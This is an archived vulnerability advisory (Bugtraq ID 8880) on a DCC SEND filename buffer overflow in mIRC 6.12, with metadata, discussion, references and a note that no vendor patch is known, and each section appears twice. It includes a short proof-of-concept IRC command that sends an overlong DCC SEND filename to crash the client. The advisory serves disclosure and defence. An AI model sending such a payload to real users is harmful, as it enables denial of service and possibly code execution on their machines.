mIRC DCC SEND Variant Buffer Overflow Vulnerability
BID:8880
Info
mIRC DCC SEND Variant Buffer Overflow Vulnerability
| Bugtraq ID: | 8880 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 23 2003 12:00AM |
| Updated: | Oct 23 2003 12:00AM |
| Credit: | This issue was reported by K-OTiK Security. Exploit was submitted by Milan 't4c' Berger. |
| Vulnerable: |
Khaled Mardam-Bey mIRC 6.12 |
| Not Vulnerable: | |
Discussion
mIRC DCC SEND Variant Buffer Overflow Vulnerability
mIRC has been reported to be prone to a variant DCC SEND buffer overflow vulnerability. The issue is said to occur when receiving a filename of excessive length, containing certain characters, and the victim user carries out a specific sequence of actions. It is said that this issue will result in a denial of service condition, however due to the nature of this issue the possibility of code execution has not been entirely ruled out.
mIRC has been reported to be prone to a variant DCC SEND buffer overflow vulnerability. The issue is said to occur when receiving a filename of excessive length, containing certain characters, and the victim user carries out a specific sequence of actions. It is said that this issue will result in a denial of service condition, however due to the nature of this issue the possibility of code execution has not been entirely ruled out.
Exploit / POC
mIRC DCC SEND Variant Buffer Overflow Vulnerability
The following proof of concept has been supplied. It should be noted that this proof of concept has not been confirmed to work against this specific vulnerability. However, due to the similarity to the issue previously disclosed (BID 8818), it is believed that this issue will effectively trigger the bug of the required sequence of events are carried out by the victim user.
/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A
The following proof of concept has been supplied. It should be noted that this proof of concept has not been confirmed to work against this specific vulnerability. However, due to the similarity to the issue previously disclosed (BID 8818), it is believed that this issue will effectively trigger the bug of the required sequence of events are carried out by the victim user.
/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A
Solution / Fix
mIRC DCC SEND Variant Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
mIRC DCC SEND Variant Buffer Overflow Vulnerability
References:
References:
- mIRC Homepage (mIRC)
- (Fw) : mIRC 6.12 (latest) DCC Exploit (K-OTiK Security
)